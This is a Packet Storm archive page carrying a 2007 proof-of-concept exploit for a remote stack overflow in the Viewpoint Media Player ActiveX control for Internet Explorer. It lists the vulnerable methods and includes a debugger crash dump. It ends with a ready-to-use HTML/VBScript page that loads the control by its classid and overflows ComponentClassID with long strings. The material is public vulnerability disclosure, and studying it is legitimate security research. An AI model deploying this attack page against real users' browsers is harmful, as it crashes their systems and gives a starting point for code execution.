exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

viewpoint-overflow.txt

viewpoint-overflow.txt
Posted Nov 7, 2007
Authored by shinnai | Site shinnai.altervista.org

Viewpoint Media Player version 3.2 for Internet Explorer remote stack overflow proof of concept exploit.

tags | exploit, remote, overflow, proof of concept
SHA-256 | 63b53b1edf12ed3525c1461fd66b5ecbd3aa6da501ffe4b1dfa28d8b30301a00

viewpoint-overflow.txt

Change Mirror Download
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>Viewpoint Media Player for IE 3.2 (AxMetaStream.dll) Remote Stack Overflow</b>
url: http://www.viewpoint.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

<b>Technical details:</b>
File: AxMetaStream.dll
Version: 3.3.2.26 (other versions may also be vulnerable)
MD5 Hash: 3163B59E1C568C8C6EACA1EAB06FA851

<b>Marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
KillBitSet: False</b>

<b>Bug description:</b>
The AxMetaStream activex contains various methods which accept parameters as String.
All these methods are vulnerable to a stack based buffer overflow when you pass an
overly long (greater than 6999 characters).
This is the list of all vulnerable methods:

<b>BroadcastKey()
BroadcastKeyFileURL()
Component()
ComponentClassID()
ComponentFileName()
ExtraProperty()
Properties()
RequiredVersions()
Source()
XMLText()</b>

<b>Product description (from <a href='http://en.wikipedia.org/wiki/Viewpoint_Media_Player'>http://en.wikipedia.org/wiki/Viewpoint_Media_Player</a>)</b>

Viewpoint Media Player is a web browser plug-in that enables users to
view 3D content and other rich media, such as Flash content and video,
on the Internet.
Viewpoint Media Player is included with AOL Instant Greetings, AIM
Themes and some other web applications.
Viewpoint Media Player is distributed with AOL, AIM, versions of Netscape,
certain Adobe products, and some retail computers sold today.
Despite this, these applications will most often work perfectly when Viewpoint
is removed.
A few companies, ranging from online retailers to auto manufacturers,
use Viewpoint Media Player as the graphics platform for interactive 3D tours
of their products.
Viewpoint Media Player powers product tours of the Toyota 4Runner and Sony laptop,
desktop, and server computing products. Despite the arguable usefulness of Viewpoint,
the vast majority of sites will stay away from it, and in practice not having
Viewpoint installed is not going to be an issue.

<b>This is a report at the moment of the overflow using first exploit:</b>

1) Disassembly:
77C172E3 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <- CRASH

2) Registers:
EAX 026A26E4
ECX 000005B9
EDX 00000000
EBX 0269F00C
ESP 0188B668
EBP 0188B670
ESI 026A1000
EDI 0269F494 ASCII "BBBBBBBBBB..."
EIP 77C172E3 msvcrt.77C172E3

3) Panel:
ECX=000005B9 (decimal 1465.)
DS:[ESI]=[026A1000]=???
ES:[EDI]=[0269F494]=42424242

4) Dump:
02681494 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
026814A4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
026814B4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
026814C4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
026814D4 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
--------------------------------------------------------------------------------
<object classid='clsid:03F998B2-0E00-11D3-A498-00104B6EB52E' id='test' style='width: 1px; height: 1px'></object>

<input language=VBScript onclick=expl1() type=button value='Exploit #1'>

<input language=VBScript onclick=expl2() type=button value='Exploit #2'>

<script language='VBScript'>
Sub expl1
For i = 1 to 3
buff = String(7000, "B")
test.ComponentClassID = buff
Next
End Sub

Sub Expl2
buff = String(600000, "B")
test.ComponentClassID = buff
End Sub
</script>
</span></span>
</code></pre>

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    53 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close